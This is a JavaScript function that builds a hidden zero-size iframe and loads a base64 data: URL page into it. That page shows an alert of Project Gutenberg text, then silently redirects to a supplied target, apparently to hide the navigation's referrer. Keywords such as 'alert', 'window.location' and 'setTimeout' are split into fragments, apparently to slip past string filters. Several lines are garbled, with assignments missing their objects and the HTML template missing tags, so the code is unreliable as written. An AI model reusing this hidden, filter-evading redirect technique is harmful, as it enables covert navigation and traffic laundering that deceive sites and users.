function winding_paths(referer, target, iframe_name) { if (null == iframe_name || 0 == iframe_name.length) { iframe_name = "iframe_" + Math.floor(Math.random() * 999999); } var iframe = document.getElementById(iframe_name); if (null == iframe) { iframe = document.createElement("iframe"); = iframe_name; iframe.height = 0; iframe.width = 0;["display"] = "none"; document.body.appendChild(iframe); } // text from randomly selected Project Gutenberg book // Winding Paths, by Gertrude Page var text = "WINDING PATHS\\\\n" + "\\\\n" + "CHAPTER I\\\\n" + "\\\\n" + "There were several interesting points about Hal Pritchard and\\\\n" + "Lorraine Vivian, but perhaps the most striking was their\\\\n" + "friendship for each other. From two wide-apart extremes they had\\\\n" + "somehow gravitated together, and commenced at boarding-school a\\\\n" + "friendship which only deepened and strengthened after their exit\\\\n" + "from the wise supervision of the Misses Walton, and their\\\\n" + "entrance as \\\"finished\\\" young women into the wide area of the\\\\n" + "world at large.\\\\n" + "\\\\n" + "Lorraine went first. She was six years older than Hal, and under\\\\n" + "ordinary circumstances would hardly have been at school with her\\\\n" + "at all. As it was, she went at nineteen because she was not very\\\\n" + "strong, and sea air was considered good for her. She was a short\\\\n" + "of parlour-boarder, sent to study languages and accomplishments\\\\n" + "while she inhaled the sea air of Eastgate. Why, among all the\\\\n" + "scholars, who for the most part regarded her as a resplendent,\\\\n" + "beautifully dressed being outside their sphere, she should have\\\\n" + "quickly developed an ardent affection for Hal, the\\\\n" + "rough-and-ready tomboy, remained a mystery; but far from being a\\\\n" + "passing fancy, it ripened steadily into a deep and lasting\\\\n" + "attachment.\\\\n" + "\\\\n" + "When Hal was fifteen, Lorraine left; and it has to be admitted\\\\n" + "that the anxious, motherly hearts of the Misses Walton drew a\\\\n" + "deep breath of relief, and hoped the friendship would now cease,\\\\n" + "unfed by daily contact and daily mutual interests. But there\\\\n" + "they under-estimated the depth of affection already in the\\\\n" + "hearts of the girls, and their natural loyalty, which scorned a\\\\n" + "mere question of separation, and entered into one another\\\\'s\\\\n" + "interests just as eagerly as when they were together.\\\\n" + ""; var exec = "\"a" + "lert('" + text + "'); wi" + "ndow.lo" + "cation='" + target + "';\""; var newsrc = "" + "" + "<\/head>" + "" + "setT" + "imeout(" + exec + ", 900);" + "<\/scr" + "ipt><\/body><\/html>"; iframe["src"]="data:text/html;base64," + btoa(newsrc); return iframe; }